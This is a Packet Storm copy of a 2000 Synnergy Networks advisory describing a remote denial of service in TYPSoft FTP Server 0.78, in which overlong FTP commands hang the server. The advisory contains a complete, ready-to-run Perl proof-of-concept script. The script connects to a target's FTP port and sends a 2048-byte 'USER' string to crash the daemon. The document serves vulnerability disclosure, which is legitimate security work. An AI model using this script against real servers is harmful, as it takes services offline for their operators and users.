typsoft-ftpd.txt

2000-09-12T00:00:00
ID PACKETSTORM:23051
Type packetstorm
Reporter Dethy
Modified 2000-09-12T00:00:00

Description

                                        
                                            `  
*******************************************  
+ TYPSoft FTP Server remote DoS Problem +  
*******************************************  
# Advisory by dethy #  
# www.synnergy.net #  
|=========================================|  
  
Advisory # 12  
  
Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ]  
Systems : Win9X, WinNT  
Product : http://www.multimania.com/typsoft/  
Discovery : dethy@synnergy.net  
  
" Another trivial bug. "  
  
Description  
-----------  
  
TYPSoft FTP is a Freeware FTP server, with all the necessary  
features to facilitate beginners and advanced users.  
  
  
Vulnerability  
-------------  
  
TYPSoft FTP Server does not correctly deal with long commands  
over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass',  
'cwd', etc, causing the server to hang and increase system resources.  
The process will not be active until it is manually restarted.  
  
  
Exploit  
-------  
  
simple script to send a long 'user' command to the server, resulting  
in the ftpd crashing.  
  
================<cut>==================  
#!/usr/bin/perl  
use Getopt::Std;  
use IO::Socket;  
getopts('s:', \%args);  
if(!defined($args{s})){&usage;}  
$serv = $args{s};  
$foo = "A"; $number = 2048;   
$data .= $foo x $number; $EOL="\015\012";  
$remote = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $args{s},  
PeerPort => "ftp(21)",  
) || die("Unable to connect to ftp port at $args{s}\n");  
$remote->autoflush(1);  
print $remote "USER $data". $EOL;  
while (<$remote>){ print }  
print("\nCrash was successful !\n");  
  
sub usage {die("\n$0 -s <server>\n\n");}  
================</cut>====================  
  
Solution  
--------  
  
The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version   
comes out or use an alternative product.  
  
  
Disclaimer  
----------  
  
Synnergy Networks may not be held liable for the use and/or potential effects of these  
programs or advisories, nor the content contained within. Use them at your own risk.  
  
---------------------------------------------------------------------------------------  
Web : http://www.synnergy.net  
E-Mail : dethy@synnergy.net  
  
`